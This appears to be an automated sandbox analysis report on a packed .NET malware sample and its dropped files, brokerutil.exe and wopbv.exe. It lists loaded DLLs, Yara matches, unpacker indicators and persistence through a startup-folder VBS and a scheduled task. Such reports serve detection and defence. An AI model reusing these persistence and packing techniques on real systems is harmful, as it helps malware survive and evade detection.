                      Source: C:\Users\user\AppData\Local\brokerutil.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\brokerutil.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\brokerutil.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\brokerutil.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\brokerutil.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\brokerutil.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\brokerutil.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\brokerutil.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\brokerutil.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: mstask.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: textinputframework.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: wsock32.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: version.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: mstask.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: textinputframework.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: uC4EETMDcz.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: uC4EETMDcz.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: uC4EETMDcz.exe, 00000001.00000002.2392969928.0000000003C12000.00000004.00000800.00020000.00000000.sdmp, uC4EETMDcz.exe, 00000001.00000002.2398413540.00000000055C0000.00000004.08000000.00040000.00000000.sdmp, wopbv.exe, 00000004.00000002.2630250940.00000000039BC000.00000004.00000800.00020000.00000000.sdmp, wopbv.exe, 0000000B.00000002.3066703726.00000000059A0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: uC4EETMDcz.exe, 00000001.00000002.2392969928.0000000003C12000.00000004.00000800.00020000.00000000.sdmp, uC4EETMDcz.exe, 00000001.00000002.2398413540.00000000055C0000.00000004.08000000.00040000.00000000.sdmp, wopbv.exe, 00000004.00000002.2630250940.00000000039BC000.00000004.00000800.00020000.00000000.sdmp, wopbv.exe, 0000000B.00000002.3066703726.00000000059A0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: uC4EETMDcz.exe, 00000001.00000002.2392969928.0000000003C12000.00000004.00000800.00020000.00000000.sdmp, uC4EETMDcz.exe, 00000001.00000002.2392969928.0000000003B54000.00000004.00000800.00020000.00000000.sdmp, uC4EETMDcz.exe, 00000001.00000002.2399072172.0000000005680000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdb source: uC4EETMDcz.exe, 00000001.00000002.2392969928.0000000003C12000.00000004.00000800.00020000.00000000.sdmp, uC4EETMDcz.exe, 00000001.00000002.2392969928.0000000003B54000.00000004.00000800.00020000.00000000.sdmp, uC4EETMDcz.exe, 00000001.00000002.2399072172.0000000005680000.00000004.08000000.00040000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      .NET source code contains potential unpacker
                      Source: uC4EETMDcz.exe, -.cs.Net Code: _E009 System.Reflection.Assembly.Load(byte[])
                      Source: brokerutil.exe.1.dr, -.cs.Net Code: _E009 System.Reflection.Assembly.Load(byte[])
                      Source: 1.2.uC4EETMDcz.exe.55c0000.10.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                      Source: 1.2.uC4EETMDcz.exe.55c0000.10.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                      Source: 1.2.uC4EETMDcz.exe.55c0000.10.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                      Source: 1.2.uC4EETMDcz.exe.5680000.11.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                      Source: 1.2.uC4EETMDcz.exe.5680000.11.raw.unpack, ListDecorator.cs.Net Code: Read
                      Source: 1.2.uC4EETMDcz.exe.5680000.11.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                      Source: 1.2.uC4EETMDcz.exe.5680000.11.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                      Source: 1.2.uC4EETMDcz.exe.5680000.11.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                      Source: 1.2.uC4EETMDcz.exe.3c80c50.4.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                      Source: 1.2.uC4EETMDcz.exe.3c80c50.4.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                      Source: 1.2.uC4EETMDcz.exe.3c80c50.4.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                      Yara detected Costura Assembly Loader
                      Source: Yara matchFile source: 7.2.brokerutil.exe.3d87f90.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.uC4EETMDcz.exe.5500000.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000B.00000002.3039485950.0000000003141000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2619060689.000000000286A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.2396891242.0000000005500000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2726825474.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2744031290.0000000003D31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.2378662559.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: uC4EETMDcz.exe PID: 3660, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: wopbv.exe PID: 368, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: brokerutil.exe PID: 3196, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: wopbv.exe PID: 1456, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeCode function: 1_2_00F8FA70 push 68028BD5h; retf 1_2_00F8FA7D
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeCode function: 1_2_04F9CBC8 push esp; retf 1_2_04F9CDAD
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeCode function: 1_2_04F9DE5E push ds; ret 1_2_04F9DE5F
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeCode function: 1_2_0557051E push ds; ret 1_2_0557051F
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeCode function: 1_2_0557327C push edi; iretd 1_2_05573282
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeCode function: 1_2_05573680 push edx; retf 1_2_05573687
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeCode function: 1_2_056EC3E1 push 68055635h; retf 1_2_056EC3ED
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeCode function: 3_2_0040526A push ds; ret 3_2_0040526B
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeCode function: 3_2_0040556A push ds; ret 3_2_0040556B
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeCode function: 3_2_004057D7 pushad ; retf 3_2_004057EA
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeCode function: 3_2_00405E99 push ds; ret 3_2_00405E9A
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4_2_00CF04CF push ebx; retf 0000h4_2_00CF04DA
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4_2_00CF049F push ebx; retf 0000h4_2_00CF04CA
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4_2_00CF55CF push ecx; iretd 4_2_00CF55D2
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4_2_00CF55CD push ecx; iretd 4_2_00CF55CE
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4_2_00CF55C4 push ecx; iretd 4_2_00CF55CA
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4_2_00CF55DB push edx; iretd 4_2_00CF55DE
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4_2_00CF55D9 push edx; iretd 4_2_00CF55DA
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4_2_00CF55D5 push edx; iretd 4_2_00CF55D6
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4_2_00CF55ED push esp; iretd 4_2_00CF55EE
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4_2_00CF55E7 push ebx; iretd 4_2_00CF55EA
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4_2_00CF55E1 push ebx; iretd 4_2_00CF55E2
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4_2_00CF55FC push ebp; iretd 4_2_00CF55FE
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4_2_00CF55F8 push ebp; iretd 4_2_00CF55FA
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4_2_00CF55F3 push esp; iretd 4_2_00CF55F6
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4_2_00CF09A9 push ebx; retf 5500h4_2_00CF09B6
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4_2_00CFFA70 push 680501D5h; retf 4_2_00CFFA7D
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4_2_05051913 push eax; ret 4_2_0505191D
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4_2_0507CBC8 push esp; retf 4_2_0507CDAD
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4_2_0507DE5E push ds; ret 4_2_0507DE5F
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4_2_052B051E push ds; ret 4_2_052B051F
                      Source: uC4EETMDcz.exeStatic PE information: section name: .text entropy: 7.965586296497431
                      Source: brokerutil.exe.1.drStatic PE information: section name: .text entropy: 7.965586296497431
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeFile created: C:\Users\user\AppData\Local\brokerutil.exeJump to dropped file
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeFile created: C:\ProgramData\faer\wopbv.exeJump to dropped file
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeFile created: C:\ProgramData\faer\wopbv.exeJump to dropped file

                      Boot Survival

                      barindex
                      Drops VBS files to the startup folder
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\brokerutil.vbsJump to dropped file
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\brokerutil.vbsJump to behavior
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeFile created: C:\Windows\Tasks\Test Task17.jobJump to behavior
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\brokerutil.vbsJump to behavior
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\brokerutil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\brokerutil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\brokerutil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\brokerutil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\brokerutil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\brokerutil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\brokerutil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\brokerutil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\brokerutil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\brokerutil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\brokerutil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\brokerutil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\brokerutil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\brokerutil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\brokerutil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\brokerutil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\brokerutil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\brokerutil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\brokerutil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\brokerutil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\brokerutil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\brokerutil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\brokerutil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\brokerutil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\brokerutil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\brokerutil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\brokerutil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\brokerutil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\brokerutil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\brokerutil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\brokerutil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
